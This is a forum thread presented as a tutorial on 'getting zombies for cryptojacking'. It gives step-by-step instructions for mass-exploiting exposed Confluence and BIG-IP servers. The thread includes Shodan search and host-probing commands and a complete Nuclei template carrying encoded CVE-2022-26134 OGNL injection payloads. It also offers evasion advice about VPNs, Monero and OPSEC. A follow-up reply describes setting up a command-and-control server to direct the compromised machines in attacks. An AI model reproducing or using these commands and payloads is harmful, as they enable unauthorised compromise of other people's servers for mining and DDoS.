Get Zombies for Cryptojacking | Tutorial

Free Hacking Tutorials
User avatar
ethical hacker
Posts: 175
Joined: Thu Feb 29, 2024 10:48 pm

Get Zombies for Cryptojacking | Tutorial

Postby ethical hacker » Thu Jul 18, 2024 10:21 pm

INTRODUCTION
This tutorial is designed for individuals seeking to explore and elucidate the procedures for accumulating these resources for the practice of crypto-mining activities or distributed denial of service (DDoS) attacks, alongside other applications requiring a considerable number of compromised personal computers and virtual private servers (PCs / VPS).

REQUISITES
1. Shodan account having membership, membership fee for Shodan at £35 GBP or obtainable free in case of ".edu" email.
2. VPN (e.g. Mullvad).
3. Basic scripting aptitude.

WARNING
- DO NOT employ this technique without improperly concealing oneself.
- DO NOT endeavour in this without being fully aware of the consequences.
- DO NOT establish a connection via 'Secure Shell' to any compromised device from your local Computer.
- DO NOT engage in mining to your Bitcoin wallet (Monero only).
This is a fundamental process, not advanced.


TUTORIAL
1. First and foremost, secure your Shodan membership and VPN configuration.

2. Conduct a search for newly discovered CVEs (RCE only) and familiarise yourself with their workings. Thoroughly study each to increase your understanding.We shall utilise two CVEs for this thread:
- CVE-2022-26134 [X-Confluence]
- CVE-2022-1388 [BIG-IP Firewall]

Review both CVEs and the corresponding Proof of Concept available on GitHub.

3. Once comprehension is achieved, construct a Shodan dork using unique identifiers for these targeted services:
- Dork for CVE-2022-26134 [ X-Confluence]
- Dork for CVE-2022-1388 [ http.title:"BIG-IP®-+Redirect"]

Utilise these dorks to execute a Shodan search.

4. We shall utilise Shodan CLI to obtain IPs related to this service:

Code: Select all

shodan search "X-Confluence" --fields ip_str,port --separator : --limit 100 > hosts.txt

At this point, you should perceive a list of IPs along with their corresponding ports.

5. We shall employ "httprobe" or "httpx" to discern live hosts:

Code: Select all

cat hosts | httprobe -c 50 | tee live_hosts.txt


6. We shall employ Nucli to automatise testing for potential vulnerabilities extant. As we are currently engaging with the inaugural CVE, namely "Confluence", we shall utilise this template:

Code: Select all

info:
  name: Confluence - Remote Code Execution
  author: pdteam,jbertman
  severity: critical
  description: |
    Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.
  reference:
    - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
    - https://jira.atlassian.com/browse/CONFSERVER-79016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-26134
    cwe-id: CWE-74
  metadata:
    shodan-query: http.component:"Atlassian Confluence"
    verified: "true"
  tags: cve,cve2022,confluence,rce,ognl,oast,cisa

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionCont
ext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
      - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"

    stop-at-first-match: true
    req-condition: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(to_lower(all_headers_1), "x-cmd-response:")'

      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(to_lower(response_2), "confluence")'
        condition: and

    extractors:
      - type: kval
        part: header
        kval:
          - "x_cmd_response"

# Enhanced by mp on 2022/07/04

Save it under the designation "attack.yaml".

7. We shall now pass live hosts to this templates:

Code: Select all

cat live_hosts.txt | nucli -bs 50 -c 50 -t attack.yaml

At this point, one should patiently anticipate observing the emergence of one's zombies before their very gaze.

User avatar
kirisute.g0m3n
Posts: 2
Joined: Fri Sep 27, 2024 1:42 am

Re: Get Zombies for Cryptojacking | Tutorial

Postby kirisute.g0m3n » Fri Sep 27, 2024 1:43 am

Hi, this is very educational and interesting. Thanks!

But how do I use these in case of wanting to?

User avatar
ethical hacker
Posts: 175
Joined: Thu Feb 29, 2024 10:48 pm

Re: Get Zombies for Cryptojacking | Tutorial

Postby ethical hacker » Sat Sep 28, 2024 3:45 am

kirisute.g0m3n wrote:Hi, this is very educational and interesting. Thanks!

But how do I use these in case of wanting to?


After executing the command "cat live_hosts.txt | nucli -bs 50 -c 50 -t attack.yaml", you have successfully exploited the vulnerable devices and acquired control over them, transforming them into zombies.

For utilise the zombies, you can:
1. Establish a command and control server to manage and communicate with the compromised devices. This server will function as the central hub for dispatching instructions and receiving commands from the zombies.

2. Develop a script to automate the process of connecting to the zombies and issuing commands. This script should encompass functions for initiating and terminating attacks, overseeing the zombies' resources, and updating their configurations.

3. Configure the script to connect to the C&C server and obtain a list of the available zombies. This list should incorporate their IP addresses and ports, as well as any other pertinent information requisite for communication.

4. Traverse the list of zombies and employ the script to dispatch commands to each one, instructing them to execute the desired malicious activity.

5. Supervise the advancement of the assault and the performance of the zombies. Ensure that they are functioning correctly and that they are not being detected or blacklisted by the target.

6. As required, revise the script and the configurations of the zombies to enhance their performance and maximise the impact.

Note: This practice is of high risk. I recommend that if you're a novice, learn / practice a lot before attempting a real attack, in real attacks you must take great care of your OPSEC.


Return to “Hacking Tutorials”